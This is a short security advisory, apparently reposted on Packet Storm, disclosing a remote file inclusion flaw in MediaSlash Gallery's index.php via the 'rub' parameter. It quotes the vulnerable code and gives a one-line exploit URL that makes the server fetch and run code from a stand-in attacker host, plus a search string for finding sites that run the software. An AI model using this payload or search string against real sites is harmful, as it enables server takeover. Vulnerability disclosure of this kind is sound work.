MediaSlash is susceptible to a remote file inclusion flaw that allows for code execution.
5bc5f7a0848b199773a7d1bda1a9834a4256b04d24b8e074f6ee767cf56e39a7author: [Moroccan Security Team]
Vendor: www.MediaSlash.com
Vendor Contacted
greetz to : [Moroccan Security Team] CiM-TeaM and All Freinds
Google : Powered by MediaSlash.com
Details:
MediaSlash Galleryis is vulnerable to remote URL inclusion vulnerability
This flaw is due to an input validation error in the "index.php"(line 489)
script that does not validate the "rub" variable,remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server
Code:
27 . $rub = @$_GET["rub"];
...
57 . $page_menu = ''.$rub.'/index.php';
489. <? include($page_menu); ?> //!!!!!!!!
Exploit http://[trajet]/[path]/index.php?rub=http://[attacker]
http://[attacker]/index.php will be included and executed withe
the privileges of the web server
Simo64 Moroccan Security Team :) simo64[at]gmail[dot]com
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed